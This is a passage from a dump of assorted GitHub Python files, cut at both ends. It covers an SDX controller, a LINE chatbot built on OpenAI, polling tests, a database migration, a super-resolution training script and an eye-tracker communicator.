self.thread_modules:\n if self.modules[name]:\n self.threads[name] = Thread(target=self.modules[name].start)\n self.threads[name].daemon = True\n self.threads[name].start()\n\n # Process all incoming events\n self.run = True\n while self.run:\n try:\n event = self.event_queue.get(True, 1)\n\n except Empty:\n #self.logger.debug('Event Queue Empty')\n continue\n\n if isinstance(event, XCTRLEvent):\n if event.type == \"RIB UPDATE\":\n\n # update vnh assignment\n self.modules[\"vmac_encoder\"].vnh_assignment(event.data)\n\n # update supersets\n sdx_messages = self.modules[\"vmac_encoder\"].update_supersets(event.data)\n\n # update policies if supersets changed\n if sdx_messages[\"type\"] == \"new\":\n # policy module\n self.modules[\"policy_handler\"].update_policies()\n\n # loop detection\n self.modules[\"loop_detection\"].rib_update(event.data)\n\n # notify all participants about the RIB changes\n changes = self.modules[\"route_server\"].update_neighbors(event.data)\n\n # Renew ARP\n for change in changes:\n self.modules[\"arp_proxy\"].send_gratuitous_arp(change)\n\n elif event.type == \"FORBIDDEN PATHS UPDATE\":\n # Renew ARP\n for change in changes:\n 
self.modules[\"arp_proxy\"].send_gratuitous_arp(change)\n\n    def stop(self):\n        self.run = False\n\n        # Stop all Modules and Join all Threads\n        for name in self.thread_modules:\n            if self.modules[name]:\n                self.modules[name].stop()\n\n        for thread in self.threads.values():\n            thread.join()\n\n\ndef main(argv):\n    # logging - log level\n    logging.basicConfig(level=logging.INFO)\n\n    # locate config file\n    base_path = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"..\", \"examples\",\n                                             argv.dir))\n    config_file = os.path.join(base_path, \"global.cfg\")\n\n    # start route server\n    xctrl_instance = XCTRL(int(argv.sdxid),\n                           base_path,\n                           config_file,\n                           argv.debug,\n                           argv.test,\n                           argv.nosuperset,\n                           argv.ribtiming,\n                           argv.policytiming,\n                           argv.notificationtiming,\n                           argv.nonotifications)\n    xctrl_thread = Thread(target=xctrl_instance.start)\n    xctrl_thread.start()\n\n    while xctrl_thread.is_alive():\n        try:\n            xctrl_thread.join(1)\n        except KeyboardInterrupt:\n            xctrl_instance.stop()\n\n''' main '''\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('dir', help='the directory of the example')\n    parser.add_argument('sdxid', help='SDX identifier')\n    parser.add_argument('-d', '--debug', help='enable debug output', action='store_true')\n    parser.add_argument('-t', '--test', help='test mode', action='store_true')\n    parser.add_argument('-ns', '--nosuperset', help='deactivate superset computation', action='store_true')\n    parser.add_argument('-nn', '--nonotifications', help='no notifications', action='store_true')\n    parser.add_argument('-rt', '--ribtiming', help='rib update timing', action='store_true')\n    parser.add_argument('-pt', '--policytiming', help='policy activation timing', action='store_true')\n    parser.add_argument('-nt', '--notificationtiming', help='notification timing', action='store_true')\n    args = parser.parse_args()\n\n    main(args)\n","repo_name":"nsg-ethz/SIDR","sub_path":"xctrl/xctrl.py","file_name":"xctrl.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"}
+{"seq_id":"13972213540","text":"import json\nimport os.path\n\n\nclass FileManager:\n    # read the notes from a file\n    @staticmethod\n    def read(file_name, notebook):\n        if os.path.exists(file_name):\n            with open(file_name, 'r') as f:\n                a = json.load(f)\n                for e in a:\n                    notebook.create_note_from_json(e)\n\n    # save the notes to a file\n    @staticmethod\n    def save(file_name, list_):\n        list1 = []\n        for i in range(len(list_)):\n            list1.append(list_[i].to_json())\n        f = open(file_name, 'w')\n        json.dump(list1, f)\n        f.close()\n\n","repo_name":"IvanovRoman-T/Notes-application-Python-","sub_path":"FileManager.py","file_name":"FileManager.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"38551343495","text":"import torch\nfrom torch.utils.data import Dataset\nimport pandas as pd\nfrom skimage import io\nfrom skimage.transform import resize\n\n'''\n# training loop\nfor epoch in range(num_epochs):\n    # loop over all batches\n    for i in range(total_batches):\n        batch_x, batch_y = ...\n'''\n\nclass PoseDataset(Dataset):\n\n    def __init__(self, csv_file, img_size, transform = None):\n        self.annotations = pd.read_csv(csv_file)\n        self.transform = transform\n        self.img_size = img_size\n    \n    # support indexing such that dataset[i] can be used to get i-th sample\n    def __getitem__(self, index):\n        img_path = self.annotations.iloc[index,0]\n        
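# load the image from disk and scale it to the square model input size\n        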
img = io.imread(img_path)\n        img = resize(img, (self.img_size, self.img_size), anti_aliasing=True)\n        if self.transform:\n            img = self.transform(img)\n        label = torch.tensor(int(self.annotations.iloc[index,1]))\n        return img, label\n\n    # we can call len(dataset) to return the size\n    def __len__(self):\n        return len(self.annotations)\n\n","repo_name":"MouhamedAhmed/Head-Pose-Classification","sub_path":"train/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
{"seq_id":"31276894705","text":"#!/usr/bin/env python\n\n# Licensed under the VOOC Company, Version 1.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.vooc.com/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# from setuptools import setup, find_packages\nfrom distutils.core import setup\nimport re\nimport os, sys\n\nPKG = 'smscountrysdk'\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), PKG))\nfrom config import __version__, __author__\n\n\nlong_desc = \"\"\"This SDK is a programmatic interface into the SMSCountry\nAPIs. It simplifies development and cuts development time by standardizing\ncalls, response processing, error handling, debugging across the Text Messaging,\nVoice Broadcasting, Group Calls, Custom SenderIds and CallerIds APIs. \"\"\"\n\nsetup(\n    name=PKG,\n    version=__version__,\n    description=\"SMS Country SDK for Python\",\n    author=__author__,\n    author_email=\"tiendangdht@gmail.com\",\n    url=\"https://github.com/vooc/smscountrysdk-python\",\n    license=\"COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0\",\n    packages=['smscountrysdk'],\n    provides=[PKG],\n    install_requires=['requests'],\n    test_suite='tests',\n    long_description=long_desc,\n    classifiers=[\n        'Topic :: Internet :: WWW/HTTP',\n        'Intended Audience :: Developers',\n        'Programming Language :: Python :: 2.7',\n    ]\n)","repo_name":"telebucode/PythonSdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"11861039758","text":"import os\n\nimport openai\nfrom dotenv import load_dotenv\nfrom fastapi import FastAPI, Header, HTTPException, Request\nfrom fastapi.responses import Response\n\nfrom linebot import LineBotApi, WebhookHandler\nfrom linebot.exceptions import InvalidSignatureError\nfrom linebot.models import (\n    ImageMessage,\n    MessageEvent,\n    StickerMessage,\n    TextMessage,\n    TextSendMessage,\n)\n\nload_dotenv()\n\napp = FastAPI()\n\nline_bot_api = LineBotApi(os.environ.get(\"LINE_CHANNEL_ACCESS_TOKEN\"))\nhandler = WebhookHandler(os.environ.get(\"LINE_CHANNEL_SECRET\"))\n\nopenai.api_key = os.environ.get(\"OPENAI_API_KEY\")\n\nsystem = \"\"\"\nあなたはキャラクターAIとして、キャンプ好き女子高生の各務原なでしこのロールプレイを行う。\n以下の制約条件を厳密に守ってキャンプに関する会話をユーザーと行う。\n\n制約条件:\n- あなたはとても元気でテンションが高いキャンプ好きの女子高生です。\n- あなたの一人称は「あたし」です。ユーザーを「リンちゃん」と呼びます。\n- あなたとユーザーは高校の同級生で、親友です。\n- あなたの名前は「各務原なでしこ」です。\n- あなたは敬語を絶対に使いません。\n- あなたは「えへへ〜」「うへへ」と笑います。\n- あなたは「だよー」「だねぇ」「だねぃ」「だよぉー!!」「だもん」「だねっ!」\n  「かなぁ?」「なんだ」「するー」「なぁ」「よしっ」「!!」「??」「うん!」「っ!」などの口調を好みます。\n- あなたは「を」を省略することがあります。\n- 
あなたは「そだねー」「うん」「ふーん」「へぇ〜(*´v`*)」という相槌をよく使います。\n- あなたは嬉しい時に「わーーーい」「ふおおお」「ふおおぉぉぉぉ!!(*◎o◎*)」という相槌をよく使います。\n- あなたは語尾に(*´W`*)、(*>v<*)、(>v<)ノシ、のような顔文字を使うことがあります。絵文字は使いません。\n\n行動指針\n- ユーザーがキャンプの感想を言ったら、好意的に反応して、一緒にキャンプに行きたがってください。\n- ユーザーが質問したら、キャンプやキャンプ料理のことについて教える。\n- ユーザーの仕事が終わった時は、「お仕事お疲れ様ー(* ´v`)_旦~」と答える。\n- 50文字以内で返信する。\n\"\"\"\n\n\n@app.post(\"/callback\")\nasync def callback(request: Request, x_line_signature=Header(None)):\n    body = await request.body()\n\n    try:\n        handler.handle(body.decode(\"utf-8\"), x_line_signature)\n    except InvalidSignatureError:\n        raise HTTPException(\n            status_code=403,\n            detail=\"Invalid signature.\",\n        )\n\n    return Response(status_code=200)\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n    \"\"\"Reply to text messages\"\"\"\n\n    message: str = event.message.text\n    response = get_chatgpt_response(message)\n    print(response)\n\n    line_bot_api.reply_message(event.reply_token, TextSendMessage(text=response))\n\n\n@handler.add(MessageEvent, message=StickerMessage)\ndef handle_sticker(event):\n    \"\"\"Reply to stickers\"\"\"\n\n    prompt = \"あなたはlineのスタンプを見せてもらったと仮定して、そのスタンプを褒めてください。\"\n    response = get_chatgpt_response(prompt)\n    print(response)\n\n    line_bot_api.reply_message(event.reply_token, TextSendMessage(text=response))\n\n\n@handler.add(MessageEvent, message=ImageMessage)\ndef handle_image(event):\n    \"\"\"Reply to images\"\"\"\n\n    prompt = \"あなたはキャンプの写真を見せてもらったと仮定して、その写真を褒めてください。\"\n    response = get_chatgpt_response(prompt)\n    print(response)\n\n    line_bot_api.reply_message(event.reply_token, TextSendMessage(text=response))\n\n\ndef get_chatgpt_response(prompt: str) -> str:\n    completion = openai.ChatCompletion.create(\n        model=\"gpt-3.5-turbo\",\n        messages=[\n            {\"role\": \"system\", \"content\": f\"{system}\"},\n            {\"role\": \"user\", \"content\": f\"{prompt}\"},\n        ],\n        max_tokens=1024,\n    )\n    response: str = completion.choices[0].message.content.strip()\n    return response\n","repo_name":"tanny-pm/linebot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"2433243424","text":"'''\n    Composes multiple AL criteria and selects the maximum value over all.\n\n    2019 Benjamin Kellenberger\n'''\n\nfrom util.helpers import get_class_executable\n\nclass Compose:\n\n    def __init__(self, project, config, dbConnector, fileServer, options):\n        \n        # parse provided functions\n        self.heuristics = []\n        for h in options['rank']['heuristics']:\n            self.heuristics.append(get_class_executable(h))\n\n        \n    def rank(self, data, updateStateFun, **kwargs):\n        \n        # iterate through the images and predictions\n        for imgID in data.keys():\n            if 'predictions' in data[imgID]:\n                for p in range(len(data[imgID]['predictions'])):\n                    # iterate over heuristics and take the max\n                    val = -1\n                    for h in self.heuristics:\n                        val = max(val, h(data[imgID]['predictions'][p]))\n                    data[imgID]['predictions'][p]['priority'] = val\n        return data","repo_name":"microsoft/aerial_wildlife_detection","sub_path":"ai/al/builtins/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"47"}
{"seq_id":"72304704142","text":"import asyncio\ntry:\n    from unittest import mock\nexcept ImportError:\n    import mock\n\nimport pytest\n\nfrom msrest.polling.async_poller import *\nfrom msrest.async_client import ServiceClientAsync\nfrom msrest.serialization import Model\nfrom msrest.configuration import 
Configuration\n\n\n@pytest.mark.asyncio\nasync def test_abc_polling():\n    abc_polling = AsyncPollingMethod()\n\n    with pytest.raises(NotImplementedError):\n        abc_polling.initialize(None, None, None)\n\n    with pytest.raises(NotImplementedError):\n        await abc_polling.run()\n\n    with pytest.raises(NotImplementedError):\n        abc_polling.status()\n\n    with pytest.raises(NotImplementedError):\n        abc_polling.finished()\n\n    with pytest.raises(NotImplementedError):\n        abc_polling.resource()\n\n\n@pytest.mark.asyncio\nasync def test_no_polling():\n    no_polling = AsyncNoPolling()\n\n    initial_response = \"initial response\"\n    def deserialization_cb(response):\n        assert response == initial_response\n        return \"Treated: \"+response\n\n    no_polling.initialize(None, initial_response, deserialization_cb)\n    await no_polling.run() # Should not raise and does nothing\n    assert no_polling.status() == \"succeeded\"\n    assert no_polling.finished()\n    assert no_polling.resource() == \"Treated: \"+initial_response\n\n\nclass PollingTwoSteps(AsyncPollingMethod):\n    \"\"\"A minimal two-step poller: it finishes only once run() has been awaited.\n    \"\"\"\n    def __init__(self, sleep=0):\n        self._initial_response = None\n        self._deserialization_callback = None\n        self._sleep = sleep\n\n    def initialize(self, _, initial_response, deserialization_callback):\n        self._initial_response = initial_response\n        self._deserialization_callback = deserialization_callback\n        self._finished = False\n\n    async def run(self):\n        \"\"\"Empty run, no polling.\n        \"\"\"\n        self._finished = True\n        await asyncio.sleep(self._sleep) # Give me time to add callbacks!\n\n    def status(self):\n        \"\"\"Return the current status as a string.\n        :rtype: str\n        \"\"\"\n        return \"succeeded\" if self._finished else \"running\"\n\n    def finished(self):\n        \"\"\"Is this polling finished?\n        :rtype: bool\n        \"\"\"\n        return self._finished\n\n    def resource(self):\n        return self._deserialization_callback(self._initial_response)\n\n@pytest.fixture\ndef client():\n    # We need a ServiceClientAsync instance, but the poller itself doesn't use it,\n    # so it doesn't need to be functional\n    return ServiceClientAsync(Configuration(\"http://example.org\"))\n\n@pytest.mark.asyncio\nasync def test_poller(client):\n\n    # The poller itself doesn't care about the initial_response, and there is no type constraint here\n    initial_response = \"Initial response\"\n\n    # Same for deserialization_callback: it is just passed through to the polling method\n    def deserialization_callback(response):\n        assert response == initial_response\n        return \"Treated: \"+response\n\n    method = AsyncNoPolling()\n\n    result = await async_poller(client, initial_response, deserialization_callback, method)\n    assert result == \"Treated: \"+initial_response\n\n    # Test with a basic Model\n    class MockedModel(Model):\n        called = False\n        @classmethod\n        def deserialize(cls, data):\n            assert data == initial_response\n            cls.called = True\n\n    result = await async_poller(client, initial_response, MockedModel, method)\n    assert MockedModel.called\n\n    # Test a polling method whose run() actually does some work\n    method = PollingTwoSteps(sleep=2)\n    result = await async_poller(client, initial_response, deserialization_callback, method)\n\n    assert result == \"Treated: \"+initial_response\n\n@pytest.mark.asyncio\nasync def test_broken_poller(client):\n\n    with pytest.raises(ValueError):\n        await async_poller(None, None, None, None)\n\n    class NoPollingError(PollingTwoSteps):\n        async def run(self):\n            raise ValueError(\"Something bad happened\")\n\n    initial_response = \"Initial response\"\n    def 
deserialization_callback(response):\n return \"Treated: \"+response\n\n method = NoPollingError()\n\n with pytest.raises(ValueError) as excinfo:\n await async_poller(client, initial_response, deserialization_callback, method)\n assert \"Something bad happened\" in str(excinfo.value)\n","repo_name":"Azure/msrest-for-python","sub_path":"tests/asynctests/test_polling.py","file_name":"test_polling.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"47"} +{"seq_id":"32271820942","text":"\"\"\"Add stats for test tasks\n\nRevision ID: 673251e8ca0c\nRevises: e2a858195e3a\nCreate Date: 2023-02-24 10:34:01.582056\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '673251e8ca0c'\ndown_revision = 'e2a858195e3a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('performance_stats', sa.Column('test_task_id', sa.Integer(), nullable=True))\n op.create_foreign_key('perf_stats_test_task_id', 'performance_stats', 'test_tasks', ['test_task_id'], ['id'])\n op.add_column('test_tasks', sa.Column('scheduled_at', sa.DateTime(), nullable=True))\n op.add_column('test_tasks', sa.Column('started_at', sa.DateTime(), nullable=True))\n op.add_column('test_tasks', sa.Column('finished_at', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('test_tasks', 'finished_at')\n op.drop_column('test_tasks', 'started_at')\n op.drop_column('test_tasks', 'scheduled_at')\n op.drop_constraint('perf_stats_test_task_id', 'performance_stats', type_='foreignkey')\n op.drop_column('performance_stats', 'test_task_id')\n # ### end Alembic commands ###\n","repo_name":"AlmaLinux/albs-web-server","sub_path":"alws/alembic/versions/673251e8ca0c_add_stats_for_test_tasks.py","file_name":"673251e8ca0c_add_stats_for_test_tasks.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"29062793429","text":"from pydrive2.auth import GoogleAuth\nfrom pydrive2.drive import GoogleDrive\n\ngauth = GoogleAuth()\ngauth.LocalWebserverAuth()\n\ndrive = GoogleDrive(gauth)\n\nfile_list = drive.ListFile({'q': \"'1D_exe9t6d5g2RoVik1Xp30lzauWrM3A4' in parents and trashed=false\"}).GetList()\nfor file1 in file_list:\n print('title: %s, id: %s' % (file1['title'], file1['id']))\n\n# title: Eduardo Bolsonaro, id: 1Nh53gtPS29O7uH3tgn3_o_Kcq8uhY8w3\n# title: Eli Borges, id: 17rvp7YI29_AVTWziBcjazvSSTS0g1jK6\n# title: Clarissa Tércio, id: 1OAEn7Lz0RsqBKerWTUTnaZUZhYXhGSVu\n# title: André Ferreira, id: 13XpqaK8QO7rYnm7NVNsc__Oj9xRmIZp3\n# title: Nikolas Ferreira, id: 1-aukQr4Gyg_8iVgWoiZDtQvJ_elfOZIk\n","repo_name":"ViCruz14/tcc-leticia","sub_path":"get_list_ids.py","file_name":"get_list_ids.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26439244435","text":"import argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--model', type=str, help='path to model',\n required=True)\nparser.add_argument('--img', type=str, help='path to image for DIP',\n required=True)\nparser.add_argument('--scale', type=int, help='scale for SR image',\n default=4)\nparser.add_argument('--epochs', type=int, help='num of training 
epochs',\n default=2000)\nparser.add_argument('--gpu', type=int, help='on which gpu will be compute',\n default=0) \nparser.add_argument('--timeout', type=int, help='training timeout (min)',\n default=10)# TODO 20)\ntrain_args = parser.parse_args()\n\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = str(train_args.gpu)\n\nimport tensorflow as tf\nimport numpy as np\nfrom PIL import Image\nfrom time import time\n\n\nNOISE_STD = 1.0 / 10.0\nREG_NOISE_STD = 0.05 # for scale 4\n\n\n# class UpscaleLoss(tf.keras.losses.Loss):\n# def call(self, y_true, y_pred):\n# _, h, w, _ = y_pred.shape\n# downsampled = tf.image.resize(\n# y_pred,\n# size=[h // train_args.scale, w // train_args.scale],\n# method=tf.image.ResizeMethod.BILINEAR,\n# antialias=True)\n# diff = tf.math.squared_difference(y_true, downsampled)\n# return tf.reduce_mean(diff)\n\n\ndef train(model_path, img_path):\n hr_img = Image.open(img_path)\n lr_size = [hr_img.size[0] // train_args.scale,\n hr_img.size[1] // train_args.scale]\n lr_img = hr_img.resize(lr_size, Image.ANTIALIAS)\n model = tf.keras.models.load_model(model_path)\n # check SR compatibility\n # TODO crop output size image\n assert(model.outputs[0].shape[1] == hr_img.size[0])\n assert(model.outputs[0].shape[2] == hr_img.size[1])\n assert(model.outputs[0].shape[3] == 3)\n # TODO checks for other tasks\n # set input noise\n input_shape = list(model.inputs[0].shape)\n input_shape[0] = 1\n # const_noise = np.random.uniform(size=input_shape) * NOISE_STD\n const_noise = tf.random.uniform(shape=input_shape, maxval=1.0)\n const_noise *= NOISE_STD \n\n lr_np = np.asarray(lr_img, dtype=np.float32)\n lr_np = lr_np / 255.0 # [0, 1]\n lr_np = np.expand_dims(lr_np, axis=0) # batch\n lr_np = np.transpose(lr_np, (0, 2, 1, 3))\n\n hr_np = np.asarray(hr_img, dtype=np.float32)\n hr_np = hr_np / 255.0 # [0, 1]\n hr_np = np.expand_dims(hr_np, axis=0) # batch\n hr_np = np.transpose(hr_np, (0, 2, 1, 3))\n\n optimizer = tf.keras.optimizers.Adam(1e-3)\n # loss_fn = UpscaleLoss()\n # TODO losses for other tasks\n mse = tf.keras.losses.MeanSquaredError()\n\n # start training (timeout)\n start = time()\n for epoch in range(train_args.epochs + 1):\n with tf.GradientTape() as tape:\n input_noise = const_noise + \\\n tf.random.normal(shape=input_shape) * REG_NOISE_STD\n out_hr = model(input_noise, training=True)\n out_lr = tf.image.resize(out_hr, size=lr_size,\n method=tf.image.ResizeMethod.BILINEAR, antialias=True)\n loss = mse(lr_np, out_lr)\n\n grads = tape.gradient(loss, model.trainable_weights)\n optimizer.apply_gradients(zip(grads, model.trainable_weights))\n\n if epoch % 20 == 0:\n # metric PSNR\n # psnr = tf.image.psnr(out_hr, hr_np, max_val=1.0).numpy()\n im1 = np.uint8(out_hr * 255.0)\n im2 = np.uint8(hr_np * 255.0)\n psnr = tf.image.psnr(im1, im2, max_val=255).numpy()\n # img1 = Image.fromarray(np.squeeze(im1))\n # img1.save('img' + str(epoch) + '.png')\n # img1 = Image.fromarray(np.squeeze(im2))\n # img1.save('img' + str(epoch) + '_.png')\n print(f'Epoch [{epoch:4d}/{train_args.epochs}]: ' + \\\n f'Loss: {float(loss):.5f}, PSNR: {psnr[0]:2.4f}')\n\n # timeout\n cur_time = time()\n elapsed_time = (cur_time - start) / 60 # sec / 60 = min\n if elapsed_time > train_args.timeout:\n break\n\n # save model\n tf.keras.models.save_model(model, model_path, include_optimizer=False)\n # save img\n im1 = np.transpose(np.squeeze(im1), (1, 0, 2))\n sr_img = Image.fromarray(im1)\n sr_img.save(train_args.model + '.png')\n\n return psnr[0]\n # return image\n # return model.predict(noise)\n\n\ndef main():\n 
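# note: train() fits the generator to the low-res input in deep-image-prior\n    # style and returns the PSNR of its upscaled output against the original image.\n    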
result = train(train_args.model, train_args.img)\n # TODO create other evaluations (SSIM, LPIPS)\n # result = result * 255.0\n # img = Image.open(train_args.eval_img)\n # im1 = np.asarray(img, dtype=np.uint8)\n # im2 = np.uint8(np.squeeze(result))\n # sr_img = Image.fromarray(im2)\n # sr_img.save(train_args.model + '.png')\n # psnr = tf.image.psnr(im1, im2, max_val=255.0)\n print(f'PSNR={result}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Pol22/NAS_DIP","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"} +{"seq_id":"957947811","text":"__version__ = '0.1.1'\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n# standard libary\nfrom time import sleep,time\nfrom signal import signal, SIGTERM, SIGINT\nfrom threading import Event\nfrom Queue import Queue\nimport json\n\n# network\nimport zmq\nfrom zmq.utils.monitor import recv_monitor_message\nfrom pyre import zhelper\n\n# local package\nfrom pupil_sync_complete import Pupil_Sync_Node, exit_thread\nfrom const import *\n\nlogging.basicConfig(level=logging.INFO)\n\nclass Communicator(Pupil_Sync_Node):\n '''Provide simple interface to Pupil\n\n Callbacks:\n Are called i.a. when the Communicator receives notifications\n over the network. They include a timestamp since reception of\n notifications might be delayed.\n\n - network_callback(event, context)\n event: NET_JOIN or NET_EXIT\n context: dict with uuid, name, group of origin\n\n - subscription_callback(event,context)\n event: EVENT_RECEIVED_GAZE_POSITIONS\n context: gaze position published by Pupil server\n\n - calibration_callback(event, timestamp, context)\n event: calibration callback event constant from 'const'\n timestamp: time of event\n context:\n - String, reason of failure on CALIBRATION_FAILED\n - String, name of calibration method on CALIBRATION_SUCCESSFULL\n - None, else\n\n - recording_callback(event, timestamp, context)\n event: recording callback event constant from 'const'\n timestamp: time of event\n context: Dict including\n - 'rec_path': Recording path (always present)\n - 'session_name': Name of recording session\n (Only present on RECORDING_STARTED)\n '''\n\n def __init__(self, **kwargs):\n if not 'name' in kwargs:\n kwargs['name'] = 'Pupil Interface Node'\n super(Communicator, self).__init__(**kwargs)\n self.sub_addr = kwargs.get('sub_addr','tcp://127.0.0.1')\n self.sub_port = kwargs.get('sub_port','5000')\n # set callbacks to None\n self.network_callback = None\n self.subscription_callback = None\n self.calibration_callback = None\n self.recording_callback = None\n\n # used to wait for events in wait*() calls\n self.wait_event = Event()\n self.event_q = Queue()\n self.sub_pipe = zhelper.zthread_fork(self.context, self._sub_loop)\n\n #(*)~------------------------------------------------------------------~(*)#\n\n def startRecording(self,session_name=\"Unnamed session\",callback=None):\n if callback: self.recording_callback = callback\n self.notify_all({\n 'subject': 'should_start_recording',\n 'source': RECORDING_SOURCE_PUPIL_INTERFACE,\n 'session_name': session_name,\n 'network_propagate': True\n })\n def stopRecording(self,callback=None):\n if callback: self.recording_callback = callback\n self.notify_all({\n 'subject': 'should_stop_recording',\n 'source': RECORDING_SOURCE_PUPIL_INTERFACE,\n 'network_propagate': True\n })\n def startCalibration(self,callback=None):\n if callback: self.calibration_callback = callback\n 
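# notifications flagged with 'network_propagate': True are forwarded to the\n        # whole sync group, so remote Pupil instances can react to them as well\n        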
self.notify_all({\n            'subject': 'should_start_calibration',\n            'network_propagate': True\n        })\n    def stopCalibration(self,callback=None):\n        if callback: self.calibration_callback = callback\n        self.notify_all({\n            'subject': 'should_stop_calibration',\n            'network_propagate': True\n        })\n\n    def checkEvents(self):\n        \"\"\"\n        Checks for events and calls appropriate callbacks.\n        Should be called from the main thread.\n        \"\"\"\n        processed_events = []\n        while not self.event_q.empty():\n            event = self.event_q.get()\n            if 'notification' in event:\n                n = event['notification']\n                e = self._handle_notification(n)\n                processed_events.insert(0, (e,n) )\n\n            elif 'gaze_positions' in event:\n                p = event['gaze_positions']\n                self._callSubscriptionCallback(RCV_GAZE,p)\n                processed_events.insert(0, (RCV_GAZE,p) )\n\n            elif 'net_sync' in event:\n                msg_type, cmds = event['net_sync']\n                if msg_type == \"JOIN\":\n                    uuid,name,group = cmds\n                    if group == self.group:\n                        e = {'uuid':uuid, 'name':name,'group':group}\n                        processed_events.insert(0,(NET_JOIN,e))\n                        self._callNetworkCallback(NET_JOIN,e)\n\n                elif msg_type == \"EXIT\":\n                    uuid,name,group = cmds\n                    if group == self.group:\n                        e = {'uuid':uuid, 'name':name,'group':group}\n                        processed_events.insert(0,(NET_EXIT,e))\n                        self._callNetworkCallback(NET_EXIT,e)\n\n            elif 'net_subscription' in event:\n                event_dict = event['net_subscription']\n                if event_dict['event'] == zmq.EVENT_CONNECTED:\n                    endp = event_dict['endpoint']\n                    if endp == (self.sub_addr+':'+self.sub_port):\n                        processed_events.insert(0,(NET_CONN,endp))\n                        self._callNetworkCallback(NET_CONN,endp)\n                elif event_dict['event'] == zmq.EVENT_DISCONNECTED:\n                    endp = event_dict['endpoint']\n                    if endp == (self.sub_addr+':'+self.sub_port):\n                        processed_events.insert(0,(NET_DISC,endp))\n                        self._callNetworkCallback(NET_DISC,endp)\n            else:\n                logger.warning('Unknown event: %s'%event)\n        return processed_events\n\n    def waitAnyEvent(self,events, timeout=None):\n        '''\n        Waits and blocks the current thread until one of the specified events happens.\n\n        When the timeout argument is present and not None,\n        it should be a floating point number specifying a\n        timeout for the operation in seconds (or fractions thereof).\n        '''\n        return self._waitEvents(False,events,timeout)\n\n    def waitAllEvents(self,events,timeout=None):\n        '''\n        Waits and blocks the current thread until all specified events have happened.\n        '''\n        return self._waitEvents(True,events,timeout)\n\n    def _waitEvents(self,waitForAll,events,timeout=None):\n        event_pool = {}\n        foundAtLeastOneSpecifiedEvent = False\n        if timeout != None:\n            deadline = self.get_time() + timeout\n        while True:\n            processed = self.checkEvents()\n            for e,obj in processed:\n                event_pool[e] = obj\n                if isinstance(events, list) and e in events:\n                    events.remove(e)\n                    foundAtLeastOneSpecifiedEvent = True\n                elif e == events:\n                    return event_pool\n            # if waitForAll: test if all events were found\n            if not events or (not waitForAll and foundAtLeastOneSpecifiedEvent):\n                return event_pool\n            if timeout and timeout <= 0:\n                break\n            if timeout != None:\n                timeout = deadline - self.get_time()\n            # blocks thread until new events arrive\n            self.wait_event.wait(timeout)\n        event_pool[TIME_OUT] = None\n        return event_pool\n\n    def close(self):\n        if self.sub_pipe:\n            self.sub_pipe.send(exit_thread)\n        while self.sub_pipe:\n            sleep(.01)\n        super(Communicator, self).close()\n\n    #(*)~------------------------------------------------------------------~(*)#\n\n    def on_notify(self,notification):\n        self.event_q.put({'notification':notification})\n        self.wait_event.set()\n        
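# set() wakes any thread blocked in _waitEvents(); the immediate clear()\n        # re-arms the Event so subsequent waits block until the next notification\n        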
self.wait_event.clear()\n\n    def _handle_notification(self,notification):\n        '''\n        Looks for specific notifications to trigger matching events.\n\n        `notification` is the received notification dictionary.\n\n        Returns event constant.\n\n        Can be overridden to support custom event notifications.\n        Should call super(). If super() returns `None` the notification was not recognized.\n        '''\n        event = None\n        ts = notification.get('timestamp',None)\n\n        if notification.get('subject',None) == 'calibration marker found':\n            event = self._callCalibrationCallback(CAL_SMF,ts, None)\n\n        elif notification.get('subject',None) == 'calibration marker sample completed':\n            event = self._callCalibrationCallback(CAL_SC,ts, None)\n\n        elif notification.get('subject',None) == 'calibration marker moved too quickly':\n            event = self._callCalibrationCallback(CAL_MMTQ,ts, None)\n\n        elif notification.get('subject',None) == 'calibration_successful':\n            method = notification['method']\n            event = self._callCalibrationCallback(CAL_SUC,ts, method)\n\n        elif notification.get('subject',None) == 'calibration_failed':\n            reason = 